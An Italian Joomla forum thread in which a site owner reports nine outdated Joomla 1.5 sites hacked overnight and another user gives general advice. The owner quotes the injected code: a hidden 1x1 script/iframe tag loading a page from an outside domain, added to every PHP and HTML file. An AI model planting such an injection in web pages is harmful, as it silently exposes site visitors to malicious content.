Back to top

Autore Topic: Siti web hackerati nello stesso giorno e su servizi di Hosting differenti.  (Letto 1035 volte)

Offline espressioneweb

• Nuovo arrivato
  • *
    • Mostra profilo
Buongiorno,
ringrazio chiunque volesse intervernire perch non so dove sbattere la testa.
Ad oggi il nono sito web joomla hackerato su 3 servizi di hostig differenti e tutti gli attacchi sono avvenuti tra le ore 11.00 del 11/03/2013 e le ore 2.00 del 12/03/2012.

Descrizione dei vari siti web e dell'accaduto
Versione Joomla 1.5.18 a 1.5.23 (ok colpa mia non li ho aggiornati)
tutti i file con estensione php e html sono stati "aggiornati" e vi hanno integrato un codice il seguente:

<script language='JavaScript' type='text/javascript' iframe src="http://u95d.info/in.cgi?default" height=1 width=1 frameborder=0>

NB non hanno corrotto tutti i siti web (ad oggi) ma solo alcuni.

Ora vi qualcun altro coinvolto in questo hackeraggio ed eventalmente prima di trovarsi con molti pi siti web defacciati una possibile soluzione.

Grazie in anticipo.

Offline giusebos

• Fuori controllo
  • *
  • Giuseppe Serbelloni Mazzanti Viendalmare
    • Mostra profilo
Se i 9 siti sono riconducibili a te con link whois o altro, tipo estensioni scaricate chiss da quale sito........ questi bucatori di siti non hanno dovuto far altro che provare a vedere se dopo il primo anche gli altri non erano aggiornati.

Quello che accaduto a te accade ogni giorno purtroppo, per contrastare il fenomeno le regole sono sempre le stesse e mi fermo qui, questa sezione del forum parla  da sola....

Non c' molto da dire, fatti passare l'incazzatura, rimboccati le maniche e ricomincia da capo. ;)
« Ultima modifica: 13 Mar 2012, 15:15:13 da giusebos »
su www.icagenda.it guide e tutorial con esempi di chronoforms e chronoconnectivity

Web Design Bolzano Kreatif